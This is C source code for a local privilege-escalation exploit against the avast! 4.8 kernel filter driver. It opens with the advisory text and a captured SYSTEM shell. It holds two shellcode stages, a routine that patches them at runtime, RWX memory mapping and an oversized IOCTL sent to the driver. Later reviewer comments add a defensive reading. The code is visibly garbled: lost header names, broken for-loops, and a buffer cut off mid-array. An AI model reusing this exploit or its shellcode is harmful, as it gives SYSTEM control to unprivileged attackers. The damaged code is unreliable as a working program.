/* NOTE(review): the six header names were lost when this page was extracted
 * (everything between '<' and '>' was dropped). The same damage appears inside
 * the three for-statements further down. The original names cannot be
 * recovered from this copy, so the directives are left as found. */
#include
#include
#include
#include
#include
#include

/*
 Program : avast! 4.8.1335 Professionnel
 Homepage : http://www.avast.com
 Discovery : 2009/07/29
 Author Contacted : 2009/07/31
 Found by : Heurs
 This Advisory : Heurs
 Contact : heurs@ghostsinthstack.org

 //----- Application description
 avast! antivirus software represents complete virus protection, offering full desktop security
 including a resident shield. This antivirus is certified by both ICSA Labs and West Coast Labs Checkmark.

 //----- Description of vulnerability
 The File System Filter driver is prone to a local kernel buffer overflow. This vulnerability allows
 an intruder to gain SYSTEM privileges on a Windows system from a limited user account.

 //----- Proof Of Concept
 http://www.sysdream.com/LocalEscalation_Avast.rar

 //----- Credits
 http://www.sysdream.com
 http://ghostsinthestack.org
 s.leberre at sysdream dot com
 heurs at ghostsinthestack dot org

 //----- Greetings
 Virtualabs

 //-----Exploitation
 ###############################################
 Avast Kernel Buffer Overflow Vulnerability
 Proof Of Concept...

 ===> Found : LocalEscalation_Avast.exe : 2676
 Shellcode PID Uploaded !
 Shellcode Redirect Uploaded !
 Shellcode Stack Uploaded !
 Connecting... Found !
 Handle : 0000001C
 Microsoft Windows XP [version 5.1.2600]
 (C) Copyright 1985-2001 Microsoft Corp.

 C:\Documents and Settings\eleve\Bureau>whoami
 SYSTEM
 ###############################################
*/

/* Raw machine-code bytes that main() copies to the fixed RWX address 0x57523c00,
 * immediately ahead of ShellcodeMaster. The name suggests they adjust something
 * belonging to aswMon; the bytes are not disassembled in this copy, so treat that
 * as the author's intent rather than verified behaviour. */
char UpdateAswMon [] = { 0x5E, 0x81, 0xEE, 0x6B, 0x03, 0x00, 0x00, 0x81, 0xC6, 0x30, 0x9E, 0x00, 0x00, 0xC7, 0x06, 0x00, 0x00, 0x00, 0x00 };

/* First-stage payload. Three 4-byte placeholders are visible in the bytes below
 * (0x41414141, 0x11111111, 0x22222222); MajShellcode, MajRealShellcode and
 * MajRealStack are meant to locate those markers (the comparison itself was lost
 * in extraction) and overwrite them byte by byte with, respectively, the target
 * PID, the address of RealShellcode and a stack address, before main() copies the
 * buffer into the RWX region. Opaque bytes otherwise; not decoded here. */
char ShellcodeMaster[] =
    "\x33\xf6\x33\xff\x64\xa1\x24\x01\x00\x00\x8b\x40\x44\x05\x88\x00"
    "\x00\x00\x8b\xd0\x8b\x58\xfc\x81\xfb\x41\x41\x41\x41\x75\x02\x8b"
    "\xf0\x83\xfb\x04\x75\x02\x8b\xf8\x8b\xd6\x23\xd7\x85\xd2\x75\x08"
    "\x8b\x00\x3b\xc2\x75\xde\xeb\x10\x8b\xc7\xb9\x40\x00\x00\x00\x03"
    "\xc1\x8b\x00\x8b\xde\x89\x04\x19\xba\x11\x11\x11\x11\xb9\x22\x22"
    "\x22\x22\xb8\x3b\x00\x00\x00\x8e\xe0\x0f\x35";

/* Second-stage payload; its address replaces the 0x11111111 placeholder in
 * ShellcodeMaster (see MajRealShellcode). Opaque bytes; not decoded here. */
char RealShellcode[] =
    "\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x15"
    "\xf3\x1d\xb8\x83\xeb\xfc\xe2\xf4\xe9\x1b\x59\xb8\x15\xf3\x96\xfd"
    "\x29\x78\x61\xbd\x6d\xf2\xf2\x33\x5a\xeb\x96\xe7\x35\xf2\xf6\xf1"
    "\x9e\xc7\x96\xb9\xfb\xc2\xdd\x21\xb9\x77\xdd\xcc\x12\x32\xd7\xb5"
    "\x14\x31\xf6\x4c\x2e\xa7\x39\xbc\x60\x16\x96\xe7\x31\xf2\xf6\xde"
    "\x9e\xff\x56\x33\x4a\xef\x1c\x53\x9e\xef\x96\xb9\xfe\x7a\x41\x9c"
    "\x11\x30\x2c\x78\x71\x78\x5d\x88\x90\x33\x65\xb4\x9e\xb3\x11\x33"
    "\x65\xef\xb0\x33\x7d\xfb\xf6\xb1\x9e\x73\xad\xb8\x15\xf3\x96\xd0"
    "\x29\xac\x2c\x4e\x75\xa5\x94\x40\x96\x33\x66\xe8\x7d\x8d\xc5\x5a"
    "\x66\x9b\x85\x46\x9f\xfd\x4a\x47\xf2\x90\x70\xdc\x3b\x96\x65\xdd"
    "\x15\xf3\x1d\xb8";

/* Returns the PID of the first running process whose image name equals name_Proc
 * case-insensitively, walking a Toolhelp32 process snapshot.
 * On every failure path -- snapshot creation, Process32First, or no match at all --
 * it prints a message, waits for a key and calls exit(0): the process ends with a
 * success status and the caller never receives an error return.
 * Review notes: the snapshot handle leaks when the very first entry matches (only
 * the Process32Next loop calls CloseHandle); th32ProcessID is a DWORD but is
 * printed with %d; strcasecmp and getch are not standard C, which together with
 * the AT&T-syntax __asm__ in FindStack points to a GCC-based Windows build --
 * confirm against the original toolchain. */
int GetPidByName(char * name_Proc) {
    PROCESSENTRY32 PEntry;
    HANDLE hTool32;
    PEntry.dwSize = sizeof(PROCESSENTRY32);           /* required before Process32First */
    hTool32 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hTool32 == INVALID_HANDLE_VALUE) {
        printf("\nError ==> CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)");
        getch();
        exit(0);
    }
    if(!Process32First(hTool32, &PEntry)) {
        printf("\nError ==> Process32First(hTool32, &PEntry)");
        getch();
        exit(0);
    }
    if (!strcasecmp(PEntry.szExeFile, name_Proc)) {
        /* match on the first entry: note hTool32 is not closed on this path */
        printf("===> Found : %s : %d\n\n", PEntry.szExeFile, PEntry.th32ProcessID);
        return PEntry.th32ProcessID;
    }
    //printf( "\n Process : PID\n");
    while(Process32Next(hTool32, &PEntry) != 0){
        if (strcasecmp(PEntry.szExeFile, name_Proc) == 0) {
            CloseHandle(hTool32);
            printf("===> Found : %s : %d\n\n", PEntry.szExeFile, PEntry.th32ProcessID);
            return PEntry.th32ProcessID;
        }
        //printf("===> Trouver : %s : %d\n", PEntry.szExeFile, PEntry.th32ProcessID);
    }
    /* "%s was not found." -- runtime string kept as in the original */
    printf("\n%s n'a pas ete trouve.", name_Proc);
    getch();
    exit(0);
}

/* Patches the PID of ProcessName into ShellcodeMaster in place of the 0x41414141
 * placeholder, one byte at a time in little-endian order.
 * NOTE(review): extraction dropped the text between '<' and '>' inside the for
 * statement. The loop bound, the comparison against MagicWord and the writes of
 * the two low bytes are missing from this copy -- which is why MagicWord looks
 * unused and why the for(...) header below does not parse. Only the writes of
 * bytes 2 and 3 survive; nothing has been reconstructed. */
void MajShellcode(char * ProcessName){
    DWORD ProcessID;
    DWORD MagicWord = 0x41414141;                     /* marker searched for in ShellcodeMaster */
    int i;
    ProcessID = GetPidByName(ProcessName);
    for (i=0; i> 8;                                   /* garbled by extraction, see note above */
        ShellcodeMaster[i+2] = ((DWORD) ProcessID & 0x00FF0000) >> 16;
        ShellcodeMaster[i+3] = ((DWORD) ProcessID & 0xFF000000) >> 24;
        printf("Shellcode PID Uploaded !\n");
        return;
    } }
    printf("Shellcode PID NOT Uploaded :\'(\n");
    return;
}

/* Patches the address of RealShellcode into ShellcodeMaster in place of the
 * 0x11111111 placeholder. Same extraction damage in the for statement as in
 * MajShellcode. (DWORD) &RealShellcode truncates a pointer to 32 bits, so this
 * only makes sense for a 32-bit build -- TODO confirm. */
void MajRealShellcode(){
    int i;
    DWORD MagicWord = 0x11111111;                     /* marker searched for in ShellcodeMaster */
    for (i=0; i> 8;                                   /* garbled by extraction, see note above */
        ShellcodeMaster[i+2] = ((DWORD) &RealShellcode & 0x00FF0000) >> 16;
        ShellcodeMaster[i+3] = ((DWORD) &RealShellcode & 0xFF000000) >> 24;
        printf("Shellcode Redirect Uploaded !\n");
        return;
    } }
    printf("Shellcode Redirect NOT Uploaded :\'(\n");
    return;
}

/* Intended, judging by its name and its use in MajRealStack, to return the
 * current stack pointer. Observations: the operands use AT&T syntax (%reg), in
 * which "mov %eax, %esp" moves EAX into ESP rather than ESP into EAX; the
 * following "leave" reloads ESP from EBP, so in effect the function returns
 * whatever EAX held on entry. There is no C return statement, which is undefined
 * behaviour if the value is used. In practice it is not: MajRealStack takes the
 * address of its own local instead (see below). */
int FindStack(){
    __asm__(
        "mov %eax, %esp\n\t"
        "leave\n\t"
        "ret\n\t"
    );
}

/* Patches a stack address into ShellcodeMaster in place of the 0x22222222
 * placeholder. What is actually written is &StackLocation -- the address of this
 * function's local variable -- not the value FindStack() returned, so FindStack's
 * result is effectively discarded. Same extraction damage in the for statement
 * as in MajShellcode; the failure message says "Shellcode NOT Uploaded" without
 * naming which patch failed. */
void MajRealStack(){
    int i;
    DWORD MagicWord = 0x22222222;                     /* marker searched for in ShellcodeMaster */
    DWORD StackLocation = FindStack();               /* value unused; only &StackLocation is read */
    for (i=0; i> 8;                                   /* garbled by extraction, see note above */
        ShellcodeMaster[i+2] = ((DWORD) &StackLocation & 0x00FF0000) >> 16;
        ShellcodeMaster[i+3] = ((DWORD) &StackLocation & 0xFF000000) >> 24;
        printf("Shellcode Stack Uploaded !\n");
        return;
    } }
    printf("Shellcode NOT Uploaded :\'(\n");
    return;
}

/* "Display file list": prints the names found by FindFirstFileW/FindNextFileW on
 * "*.*" in the current directory, one per line with %ws.
 * Review notes: Dossier is never initialised before it is passed to
 * SetCurrentDirectory, so that call reads an indeterminate buffer (undefined
 * behaviour; most likely it fails and the directory is unchanged); FindClose is
 * called even when FindFirstFileW returned INVALID_HANDLE_VALUE; and the first
 * entry is printed unconditionally despite the original comment about skipping
 * directories. */
void AfficherListeFichiers(void) {
    HANDLE hFind;
    WIN32_FIND_DATAW FindData;
    char Dossier[1024];
    // Change directory (Dossier is uninitialised here -- see note above)
    SetCurrentDirectory(Dossier);
    // Start of the search
    hFind=FindFirstFileW(L"*.*", &FindData);
    if (hFind!=INVALID_HANDLE_VALUE) {
        // Original comment: "if the entry found is a file rather than a directory, print its name"
        // (no such check is actually made -- every entry is printed)
        printf("%ws\n",FindData.cFileName);
        // Following entries
        while (FindNextFileW(hFind, &FindData)) {
            printf("%ws\n",FindData.cFileName);
        }
    }
    // End of the search (reached even when hFind is INVALID_HANDLE_VALUE)
    FindClose(hFind);
}

/* Entry point. Sequence: patch the three placeholders in ShellcodeMaster, reserve
 * and commit a fixed RWX region at 0x57520000 and copy UpdateAswMon followed by
 * ShellcodeMaster to 0x57523c00, open the \\.\aswMon device (retrying once a
 * second until the open succeeds), send IOCTL 0xb2c8000c twice with Crashing as
 * the input buffer, list the current directory, then close the handle.
 * Defender's reading: the whole program runs as a limited user. The two
 * properties the report rests on are (1) the \\.\aswMon device object being
 * openable for read/write by a non-administrator and (2) the IOCTL dispatch
 * routine accepting an input buffer of this size without a length check. A
 * device ACL restricting opens to the vendor's own service and administrators,
 * plus input-length validation in the handler, removes both; on the detection
 * side, a handle to \\.\aswMon held by an unexpected process is the observable.
 * Review notes: argc, argv, InitVal, choix, welcome and out are written but never
 * read; both VirtualAlloc results go unchecked and the second assignment
 * overwrites ShellcodeToExecute, which is then never used; arithmetic on (void*)
 * is a GCC extension; the DeviceIoControl return values are ignored, so
 * "Written." is printed whatever the outcome. */
int __cdecl main(int argc, char* argv[]) {
    HANDLE hDevice = (HANDLE) 0xffffffff;            /* numeric INVALID_HANDLE_VALUE, compared literally below */
    DWORD NombreByte;                                /* bytes returned by DeviceIoControl */
    DWORD InitVal=0;
    char welcome[1024], out[50];
    /* Input buffer for the IOCTL below. Its contents look random in this copy;
     * no structure is evident and none is assumed here. */
    DWORD Crashing []={
        0x73d1dde9, 0x24135758, 0xcd62b301, 0x35a96b72, 0x45c3745d, 0xcfae802b, 0xed77fbb8, 0xecc2f16d, 0xa6409255, 0x5b608056, 0x7b2e40db, 0xc250e10c, 0x284fc4b1, 0xbab9b00d, 0x2fce932c, 0x42d9380b, 0x72b21bd3, 0x4646eb4c, 0xdfcc6996, 0x4060e991, 0xce1fa555, 0xeda7ae0b, 0x4f918340, 0x90059feb, 0xf4cf7bb7, 0x8b0c9a64, 0x9b99f867, 0xd673970a, 0x591dbc4c, 0x2d54989b, 0xddb9c19d, 0x8121eaac, 0x199b21f5, 0xc30a1e03, 0x7c618cb1, 0xeb3e06f0, 0x7cebbd74, 0xaef8a969, 0x25cdcda9, 0xf47297c9, 0x58855260, 0x9b494eaa, 0x0c11e290, 0x4f1a6361, 0x75063159, 0xc791bf70, 0x3a1751db, 0xf439049a, 0x83abe375, 0xba84ad33, 0x3ca8acac, 0x17d3fd7e, 0x319c0280, 0xcd69a6c1, 0x3fdcdfe6, 0xc3903332, 0x1377c51c, 0x1cd14365, 0xa98d77f0, 0xd5746f3f, 0xb3cb7cb2, 0xddd2ecf4, 0x6cb9baa0, 0x4b0e045a, 0x98b7c236, 0x1203e0e5, 0x32449810, 0xaeb428f7, 0xa2e7e6e3, 0x3b0443af, 0x1145d62b, 0xaff5c263, 0xc496b3d7, 0x0b1c45d9, 0x8a463e85, 0x041251c8, 0x1341294d, 0xacc885c9, 0x03c3b5e7, 0x4cd36063, 0xbeec4324, 0x313554a7, 0x3b202113, 0xe836e635, 0x5d65c8bd, 0x8d52bae6, 0x24b3ba7f, 0x9b781fa7, 0x7efa8335, 0x73e87501, 0x316fcbe4, 0xfcc446bc, 0x3697162d, 0x5f706b56, 0x3d74846f, 0x57b41e55, 0x44b39b19, 0x40e6bf38, 0xa1d3527c, 0x20f6b70c, 0xa772ce22, 0x876cdf3b, 0xa948a3ad, 0x054c9fd6, 0x6ea65a25, 0x432a376f, 0x4217baa1, 0xd38f0661, 0x2c40d3d8, 0x33a62f9a, 0x5a8ef7d8, 0x4d07effa, 0x8ba68789, 0x1441d661, 0xf2f6d48f, 0x77e5d2ae, 0xcc69ac3e, 0x26cc9de9, 0xd7518e7e, 0xc568abea, 0x21089cf3, 0xdc3c48a5, 0x6110d1b2, 0x39f65dc9, 0xd0b8055d, 0xd8cab72c, 0x26be700a, 0x5f028b6c, 0x1af4a25d, 0xbae98a7c, 0x1d5e94ed, 0xb743fb4a, 0x274eaede, 0xe84bc6c6, 0xbcc3dd24, 0x47c6b5d5, 0x3f5a530f, 0x4bbd205e, 0xe5ed455d, 0xc23908e3, 0xa7255550, 0xfeee9e59, 0x8d91a28c, 0x27f1cd56, 0xbb7d2468, 0x2e53ae6f, 0x3d8ea58a, 0x9832f31e, 0x87aca912, 0xf5607f93, 0x67e4d74e,
        0xcffd3adf, 0x38bda32a, 0x1ace8bf1, 0x16ad790d, 0xe7b78a4a, 0x6e4a4f52, 0xa963805f, 0xb44512ab, 0xaaff642a, 0x68723e9a, 0x9cb006f2, 0x73439f5a, 0xcca9abc0, 0x755ec72c, 0xb90d959c, 0x96f5fed2, 0x54821cac, 0x6d3b9e97, 0x254fa473, 0xe5806bdf, 0x1d3fe779, 0x5d824e9c, 0x0cba2490, 0x86dafdd4, 0xb84d19dd, 0x1cf0ecc5, 0x73a4c777, 0x6545b564, 0x12fc70dd, 0x58357dcd, 0x70524921, 0xa4bf0661, 0xd3630be2, 0xb4f95085, 0x2f8e9f3f, 0x8fb2c303, 0x5d534373, 0x330ed7be, 0x090a7fee, 0x70a0936f, 0x91bc5628, 0x2ad2a9fb, 0x437d15d2, 0xcb860a99, 0x8bbf5d22, 0x5188ce41, 0xf419337b, 0xfe338d2c, 0xf397167d, 0xb79f4c9a, 0x982b7bd0, 0xeda0e308, 0x19079984, 0x44506743, 0x08eb3bff, 0x0b2c7b5e, 0xfc12c449, 0x122c18c3, 0xcb18effc, 0x65070b56, 0x5bbc5f36, 0xba194a66, 0x1ac6b812, 0x4936b720, 0x3064f4d9, 0xea85383a, 0x5669ab43, 0xbfb9b2be, 0x2c961814, 0x2a16193f, 0x5310fc35, 0x2dcf5351, 0x8fb793bf, 0x0b4f51df, 0x7f9c69f8, 0x76bbd7bc, 0xc2cd8ee9, 0xdaded21e, 0xeeb83782, 0xa45e26a1, 0xa94133c2, 0xaec536ad, 0xa6026a8c, 0xbcb5a191, 0xd7babca3, 0xb2d31f46, 0x19511dc1, 0x21437e92, 0x0bfaa87e, 0x32685945, 0x55016b49, 0x994f9293, 0x599f9653, 0xc492d42b, 0xfa4d8907, 0x6c1e0416, 0x073e9847, 0x9ceee897, 0x479dec42, 0x60f26898, 0xa0b37906, 0x7f433088, 0xe617b52a, 0x30df4460, 0x9945c0da, 0x5f4f9196, 0x5b3095ad, 0x41e4f285, 0x225b324a, 0xe5f83ba7, 0xbadf8b56, 0xc732f28d, 0xaa94e0d7, 0x0f9da105, 0x80936817, 0xa3b40d2e, 0xa7d5791c, 0x10b0a9bb, 0x83b95622, 0x32872694, 0x7b1b3d10, 0xe0e1adf8, 0x32512498, 0x6bc6ff89, 0x0d11fef7, 0x3875c984, 0x5a31db0e, 0xdd1df94b, 0x61148636, 0x7372b587, 0x8856950e, 0x4f0af062, 0xb49ea480, 0x799ce35e, 0x23ecabd9, 0x137ee004, 0xdd17f948, 0xf2026141, 0x8afd0e45, 0x1188ac9a, 0x0f87f038, 0xee43edef, 0x982bf738, 0x78b3ca5f, 0x4d8345d3, 0x613e2505, 0x16ab7e08, 0xa7e68888, 0xa59d234c, 0x61655904, 0xbec0d39c, 0x3d0d18b0, 0x8eb7a653, 0x6bd2ad6f, 0x3fa66b0f, 0x5951c36f, 0x8e5c4bed, 0x087d3d72, 0x65fdb9b3, 0x7aa0c8a5, 0x26c78496, 0x3a8946f1, 0xb65f63b2, 0xeacb180d, 0xbda32816, 0x424f7b1e,
        0x667fb713, 0xfe8d6f2c, 0x7f3711ca, 0x477ecf54, 0xbf36b283, 0x92a7518e, 0xfa378a84, 0x9ddc8f83, 0xc844b947, 0x3ef9ab12, 0xe892b5b4, 0x101854b2, 0x8f45e397, 0xa1b134ed, 0x5c2a4d5c, 0xa887258a, 0xbea01c90, 0xfb77c826, 0x08e87f98, 0x6c7b0709, 0x1f27fe7d, 0xe9d4d75f, 0xd3ecbaee, 0x961a35c6, 0x8317caf4, 0xc93141a0, 0x71c2fa12, 0x79afe953, 0x7024a929, 0x5187beec, 0x439aa4c4, 0x1b5bf729, 0x20de52a2, 0x5afd531b, 0xcbc6d1dc, 0x8a6c775d, 0x93823634, 0x31e3c106, 0x5c4756ec, 0xb322318f, 0x8a8fe323, 0x7d8a483f, 0x538d06a5, 0xd23e0864, 0x07739d15, 0x46845d65, 0xa90ed2a1, 0x907709ae, 0x25c51a18, 0x7b361c60, 0xf7f12530, 0xb5c8b862, 0x1e5579b7, 0x453fde63, 0x5854951c, 0xb479e4b4, 0x0187185f, 0xe310f406, 0xc5ae83f5, 0x385149c8, 0xe0538b56, 0x6ffa1c0f, 0x15a8c111, 0xb901feb0, 0x5cb53fcf, 0x7b9596dd, 0xbedc1ead, 0x6ea7517e, 0xf1c88cdb, 0x2cf213af, 0x67ebce96, 0x458465ce, 0x6503c018, 0xf7d61a9b, 0xbb31a712, 0xe0dc951b, 0x354a28a8, 0x51ecebf3, 0xdbf8e424, 0xd71a0cd2, 0x708d5b40, 0xdd1cf833, 0xb4be28a4, 0x41c589c0, 0x5d81889f, 0x97de9f7a, 0x43b18278, 0x4c312b46, 0x2ec1048d, 0x438d30d9, 0xab7923d6, 0xd36d6ed0, 0xb6165ede, 0x95369795, 0xd5b1b776, 0x60fe0b11, 0x087563ae, 0xa709eacf, 0xededbbea, 0xf134d8ea, 0x1e241ce6, 0x341248d6, 0x6c16117a, 0x7517ff23, 0x4dfb2eda, 0x7cc84423, 0x96cf942d, 0x32901498, 0xe3bc3a5d, 0x0b85bdb2, 0x7baf09ca, 0x6c7b4c01, 0xb3a72934, 0x4d33e464, 0x7dc1cf69, 0x166756c6, 0x08f5f62f, 0x3db6b309, 0xce886208, 0x1daf5a03, 0xc724741a, 0xf052f4ed, 0x4297acad, 0xdc6a5dfe, 0xd0c4a895, 0x97db4437, 0x6e227c97, 0x05f4dab0, 0x13b4adf4, 0x0d8b71e6, 0x9ff6843d, 0x0fdb8939, 0x58850dfd, 0x2b21f28e, 0x2603e115, 0xb09ba646, 0xd6fe719b, 0xe87a9223, 0x18f3b642, 0x4fb62852, 0xeda5dd40, 0x6e5dbbf4, 0x703a2f1f, 0x4884a549, 0xb6b85046, 0xdbbb7868, 0xa38e09a3, 0x66c6fa13, 0xea16a377, 0x1ced6fd3, 0x44a3e920, 0xfe995619, 0x822d3af3, 0xe8399736, 0xa6ff023c, 0x19b88da8, 0x9b26e290, 0xc6970f3e, 0x4607d070, 0x7db5bfd9, 0xbdcc2cd7, 0x946faaf6, 0xfcd89b65, 0x17712dee, 0x953a0c3f, 0xf1383334,
        0xc32e8a92, 0xeb678cf4, 0xb5265c91, 0x10ec1b31, 0x6d134dc1, 0x8ae8143e, 0x26ff3968, 0xf579d43c, 0x8f9d85f3, 0x02fad6bf, 0x3a7be637, 0xeff5542c, 0x71cd227a, 0x4345de8e, 0x5c9202c7, 0x388f640c, 0x0de7d2cd, 0xe9b74263, 0xe443d4ef, 0x9cabf0e1, 0x810b8762, 0x23c14d38, 0x296bd907, 0xdfc31794, 0x026b9455, 0x7632bccd, 0x8dcf7332, 0x23dcc4c2, 0x32885977, 0x548fdcc5, 0x9fca128a, 0x294fbc82, 0xf7bcd7db, 0x9cdcc0a9, 0xe26aec68, 0x04c39cf4, 0x0a8d0d2b, 0xf72bdf30, 0xff04366a, 0x07e7b40a, 0x9b3b9d18, 0x859b4b85, 0x53a44769, 0x0b1366e3, 0x39f4c10b, 0xb1ccbe45, 0x9d31874e, 0xa8e0a3a6, 0x98d4a7d0, 0xc24240f5, 0x421301e0, 0x09137099, 0x48d2a2dd, 0x3f0fdb4a, 0xe1a9eb43, 0x84199aff, 0x4eff2f35, 0xd52f92fd, 0xe99cb709, 0xcb8fc9ce, 0x4cd97110, 0x035f2194, 0x87e8e12d, 0xecd7a018, 0xff80434f, 0x5ad4430c, 0x51015613, 0x153a3cf8, 0x8bbb9e84, 0x31bc1b01, 0x986e7b5e, 0x4708de0c, 0xe51a3ef6, 0xd279b566, 0x4054b421, 0xd794d868, 0x5e174bd2, 0xc9480f43, 0x61e1ac80, 0x65c89d78, 0xcc461265, 0x6f8099a7, 0x76596a5c, 0xe134710e, 0x6ec09d49, 0x095b4232, 0x251f6d2c, 0xb61f7712, 0x6031640c, 0x081bb50e, 0xabfcf1aa, 0x303d79f3, 0x4e3caaa9, 0xf87540ed, 0xf067072c, 0xe1e7f3a1, 0x82dd570b, 0x2110f555, 0x988cc833, 0x985002b4, 0xedd3b5c3, 0xf952a2cd, 0x06159e37, 0x1ac3e607, 0xda6888dc, 0x534a76c9, 0x2a7a4148, 0xb5433071, 0x392f077a, 0x4f91ca6e, 0x0c7736e0, 0x780dd6ed, 0x626f3aa9, 0x26db5cac, 0xd12bc3e6, 0x70d14be1, 0x0bc60171, 0x97203228, 0x66463a8d, 0x0ac460d4, 0xdf1906b3, 0x0d19058b, 0xaa96fa9a, 0x8b220888, 0xfad29e31, 0x90049f60, 0xb44780ab, 0xe52554ea, 0xe97a3e9e, 0x2142a187, 0x6ba5f497, 0xf43334a9, 0xf9fb1c87, 0x3d1f1949, 0x064149d5, 0x2e39a1e9, 0x35669c1b, 0x0345c538, 0x623002d5, 0xa280da3a, 0xd32bc66c, 0x047c437f, 0x2b60c09c, 0x154931e8, 0x2b316b42, 0xa97028bb, 0x1b26881f, 0x0d93499d, 0xa681e3d0, 0x64aed3a1, 0xb904296b, 0x6e8ef9c5, 0xc029dbe4, 0x4c1968ca, 0xacceed0c, 0x0f137d05, 0x71b80cdb, 0xd0e3a334, 0xab958932, 0x336c6a26, 0x42626069, 0x2a2d154b, 0x14347b3a, 0xac80cd31, 0x9e9708d5, 0x1641542a,
        0x25d2dd4e, 0x5c434b1d, 0x070569b9, 0xf0f63b05, 0x2e8328a8, 0xd263cf7b, 0xea1a2370, 0xcbc81d0b, 0xf2a0075b, 0x141c700e, 0x10628529, 0x6cec92e5, 0x4aa5f3d6, 0x6c3d960f, 0x942d9d60, 0x896d6d23, 0xa29ef00b, 0x0502a28d, 0x712f7787, 0x5235ed70, 0x8945f3eb, 0x4f1ecbdd, 0xb5f457b9, 0xe7327495, 0xbdc47980, 0x85bf54c1, 0xe054753d, 0x42e6c82b, 0xb54389bb, 0xef5debf3, 0xcf310c8e, 0x2a433c26, 0xf209dc9d, 0x8a869d03, 0x45961943, 0x28f51bb9, 0x643e865c, 0xb410b2d1, 0xaf30a98c, 0xa004bb79, 0x956b7c41, 0x13e3a21d, 0xca5f4efd, 0xf13e81c1, 0x4fb74a1e, 0x2a033efb, 0x91ed2e36, 0xb9bf8c57, 0xc1b65238, 0x2b3b3e0f, 0xbc02c76b, 0xc56d0a7d, 0xb33685c2, 0x6619d068, 0x13ceb219, 0x21e2d381, 0xbc04a013, 0xafc763ef, 0xc6c9651d, 0x9139fb86, 0xdd6fe175, 0x5334d9d7, 0x4b39bc0e, 0x42035a82, 0x91cba15e, 0xcf931d84, 0x739e2767, 0x5a1c76fd, 0xd65cb444, 0x02c608e9, 0xc13aa613, 0x5f9895ec, 0x05928739, 0xd960be14, 0xbc65f387, 0xb40abdb8, 0x3833c113, 0x1fa8b468, 0x8e907e66, 0xbca30fa5, 0xef539907, 0x3f130c64, 0xaf133b06, 0x06d0d5c8, 0xe3e4f1df, 0x185f733d, 0x7ecf9d1e, 0xdfea3362, 0x33bedbe3, 0xe9a15aed, 0x4aa68eeb, 0x01e0aaf1, 0xb5ccf205, 0x9426c4cc, 0x3f80b9b4, 0x017b584a, 0x7ac85b06, 0x4ca27f77, 0x7d8548a2, 0x19025a74, 0x1d4d204c, 0x0cccb981, 0xf86a72e6, 0x2a5ef939, 0x778bfe20, 0xf536a9e7, 0x82482d36, 0x20a8484b, 0x8c08dd85, 0xc82a0739, 0xed52e038, 0x4e6f5973, 0xd799c606, 0x87dd5c7f, 0x69db7ac2, 0x56771978, 0xf682c73f, 0x40e5511c, 0xf373bc10, 0xdecc0fa4, 0xf070df4e, 0x81b33f54, 0xf1d53816, 0x2c2173e5, 0xae5a23d2, 0x0b9013fd, 0x9005857b, 0x495aa603, 0x7d7b69b9, 0x80603698, 0xeedd2b37, 0xaf7f72ea, 0xbe303f21, 0x0ea977f9, 0x0fa0708b, 0xb5792aa6, 0x87fd2a7e, 0x2bda1cd6, 0x5df64225, 0x216accb9, 0xc1808941, 0x582679b3, 0x46fbd44d, 0xe2f76929, 0x548f6e51, 0x4ac3f5d8, 0xe52e62af, 0x484110c2, 0x492fab5a, 0x2c7accea, 0x7488ca20, 0xe36a2f99, 0xba1e3785, 0xefa467bc, 0xd4665fc8, 0x2f5390e2, 0xfe450203, 0xbb624253, 0x551740a0, 0x7d50b6c9, 0xe9d20aa0, 0x55e69c01, 0x6ab186ee, 0x1c187ff3, 0x6ce6dff2, 0x120a6ce0,
        0xf6c45fd2, 0x5832b533, 0xb02e3027, 0x170d3041, 0x6f153144, 0xad980d7f, 0x49f5d3ab, 0xcedca059, 0x3db83dc5, 0x39c589c0, 0x986e3537, 0xc4d04f1d, 0xd71ee166, 0x04620370, 0x35beb3cf, 0x39249667, 0x79915fe2, 0xbe40d4da, 0xd0cab338, 0xdcb53b5a, 0xae884be7, 0x6250a5df, 0x0949574e, 0x5d5321b8, 0x86d01394, 0xd517473b, 0xe5f90827, 0x7a8ef843, 0x19869984, 0x02e8d858, 0x71954f6f, 0x6a9e300b, 0xa8a50e6b, 0xb935e9e2, 0x69f3e080, 0x3e51ad9b, 0xf485aa30, 0x4195eb53, 0x2574950c, 0x87c2c9f1, 0x955cecec, 0x2a89e224, 0x67aed18a, 0x8d473f2a, 0xa089d921, 0x50197424, 0xa94cacbd, 0xe8cddf16, 0x806b7f0d, 0xa27648b9, 0x99c702ad, 0x37db9034, 0xe7295b46, 0xa4bf4bac, 0x43d214a3, 0x8d9bc127, 0x2f72faa5, 0xf9143ef4, 0xf30bd7bf, 0x86b2517d, 0xb7a833d6, 0x037c9b1f, 0x9459bc14, 0x0c78aa23, 0xe41cc7dc, 0x4eda2ed2, 0x8c0a8f08, 0x85a8aff4, 0xae28e3ea, 0x217269d6, 0x6d221bf7, 0x6f646c75, 0x8c04d0eb, 0x7d389030, 0x1968785b, 0xe748befe, 0x7fb277a8, 0xf340540e, 0xf5a6340f, 0x47113529, 0x0c2eab43, 0xd20d8b05, 0x5306c40e, 0x9c0c1ad3, 0x52a384db, 0x26ad4373, 0x30872280, 0xc5ef9754, 0x098568fa, 0xcbc632de, 0x9efa321a, 0x8466cae3, 0x156fa462, 0x96716caa, 0x3e7cd39b, 0x27506529, 0x34cac20d, 0x05958b0a, 0xe3b1708f, 0x258ff2e9, 0x913cc9cb, 0xa5899577, 0xb9885e7b, 0xa559f53e, 0x48d99696, 0xf2d0826d, 0x0be5f805, 0x385bb433, 0x174121eb, 0x58bfd2bd, 0x4f4bc6ff, 0xc8fb45a6, 0xfac1da99, 0xcbb0841f, 0xd33a2a83, 0xdb808b49, 0x110544d1, 0x3656b868, 0x9527fb34, 0x75d35656, 0xf683f9cc, 0xe756e3f6, 0x8cf742c1, 0x60c64989, 0x2af6cecc, 0x0c70ddbb, 0x761077ee, 0xa5b3e47e, 0x52939e81, 0xa476a7db, 0x02afdf28, 0x181e76a1, 0x094c8ae4, 0x2035542d, 0xc47a48ab, 0x5f344e89, 0x6c0eaf8d, 0xed89747c, 0x718af660, 0xed1386e1, 0xfe37f3d2, 0x06817e6b, 0x600c9381, 0xbab81e8f, 0xe7a49506, 0xb5070118, 0x2cf72a58, 0xde08c7f4, 0x109eead3, 0x38ca65ba, 0xab924774, 0x26e006f2, 0x52fc4fc1, 0x2c4453a1, 0x700a621d, 0x014dc1dc, 0x3aef70de, 0x7c87331d, 0x89433add, 0xcbf6a8fc, 